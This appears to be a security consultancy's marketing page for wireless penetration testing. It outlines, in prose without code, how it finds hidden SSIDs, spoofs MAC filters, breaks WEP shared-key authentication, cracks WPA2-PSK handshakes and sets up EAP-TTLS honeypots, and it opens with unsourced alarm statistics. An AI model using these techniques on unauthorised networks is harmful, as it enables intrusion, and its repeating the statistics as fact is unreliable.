• Did you know that most organizations still use
    IIS 6 and 7 which are vulnerable to public exploits ?

    Did you know that 90% organizations never update
    Java due of application dependency ?

    Did you know that 95% organizations never thought
    of updating flash plugin installed on the browsers ?
  • Did you know that 65% organizations still
    use 123456 as their password ?

    Are you aware that the local admin credentials can be stolen
    from the end-user systems by using Pass-The-Hash (PTH) attacks ?
  • Did you know that most organizations have not configured NTP
    on their network devices leading to difficulty in identifying
    the attack trail from an audit log.?

    Did you know that most organizations have not
    fine-tuned their web gateways / IDS / IPS
    to get the best results ?

Wireless Penetration Testing

"Wireless networks are an extension of your organization’s infrastructure perimeter and should be tested thoroughly. An insecure wireless network opens up your organization’s doors to the external world and poses a security risk. Rogue access points, installed by employees on the infrastructure, which do not follow the organization’s security guidelines, can also be used to compromise your organization. Defenseroot Consulting conducts a mix of black box and white box testing. We start by completing a site survey, where we use high powered wireless equipment to locate access points. Thereafter, we simulate multiple real-world hacking scenarios to break into the wireless network and then verify whether the internal segmentation and access controls are adequately implemented to ensure that a guest user connecting to a wireless network cannot connect to an internal wired LAN."

Here we will find the SSID of networks configured to be non-broadcasting (Hidden SSID). We will first understand the hidden SSIDs and how they work using Beacon frames. Then we will explore both passive and active techniques to discover the SSID of a Hidden SSID network.

We would bypass MAC based filters applied on access points. MAC filters are a network access filter added by the AP software and are not really present in the 802.11's security standard. We will find if a MAC based filter is present on the access point, how to evaluate an authorized client's MAC address and finally how to emulate an authorized Client MAC to successfully Authenticate and Associate with the Access Point.

We would hack through various WLAN Authentication schemas - Open and Shared Authentication. Here we would break shared key authentication (SKA). Shared Key Authentication requires the use of WEP encryption and is fundamentally flawed.

We would crack WPA2/ PSK by verifying the MIC creation and Encryption algorithms in the Key Information field in the 4 way handshake.

Here we will verify how EAP-TTLS based authentication is just as susceptible to Certificate spoofing attacks like PEAP. We will use different inner authentication protocols with EAP-TTLS - MSCHAPv2, MSCHAP, CHAP, PAP etc. and see whether a hacker could create a honeypot and crack the client password."